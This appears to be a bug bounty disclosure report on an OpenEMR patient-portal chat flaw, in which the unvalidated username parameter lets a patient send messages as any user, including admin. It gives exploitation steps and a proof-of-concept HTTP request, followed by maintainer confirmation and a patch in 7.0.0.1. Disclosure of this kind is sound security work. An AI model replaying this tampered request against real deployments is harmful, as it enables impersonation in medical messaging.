Send message in chat function with any username in openemr/openemr

Valid

Reported on

Jul 20th 2022


Description

In chat function, username is not validated. We can change username to any value we want which not match with logged in user.

Exploitation steps:

1. Login with Phil1 account (Patient account).
2. Send message via Burpsuite proxy
3. Modify username to any value you want (I user "n00b")
4. As the result, the message is sent from "n00b" not from "Phil Belford"

Proof of Concept

POST /openemr/portal/messaging/secure_chat.php?action=save HTTP/1.1
Host: demo.openemr.io
Cookie: username=Phil%20Belford; PortalOpenEMR=wte53yTGjI7VYMcBHd%2C%2CO%2C-qdK6nklsE7Qo2F87g949Hz988
Referer: https://demo.openemr.io/openemr/portal/messaging/secure_chat.php
...

username=n00b&message=message+from+n00b&sender_id=1&recip_id=%5B%22admin%22%5D

POC image:

POCimage

Impact

Attackers can impersonate any user he wants even admin to chat with others.

We are processing your report and will contact the openemr team within 24 hours. 2 months ago
Lê Thị Mỹ Duyên modified the report
2 months ago
We have contacted a member of the openemr team and are waiting to hear back 2 months ago
We have sent a follow up to the openemr team. We will try again in 7 days. 2 months ago
Brady Miller validated this vulnerability 2 months ago

Thanks for the reports. We are working on a fix.

Lê Thị Mỹ Duyên has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Brady Miller
2 months ago

Maintainer


A preliminary fix has been posted in commit 41b4888a36d68a666995562ff3edb3e55f64b9cd

Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.0.1), which will likely be in about 3-7 weeks. After I do that, then will be ok to make CVE # and make it public.

Thanks!

We have sent a fix follow up to the openemr team. We will try again in 7 days. 2 months ago
We have sent a second fix follow up to the openemr team. We will try again in 10 days. 2 months ago
Brady Miller confirmed that a fix has been merged on 41b488 a month ago
The fix bounty has been dropped
Brady Miller
a month ago

Maintainer


OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make CVE # and make this public.

to join this conversation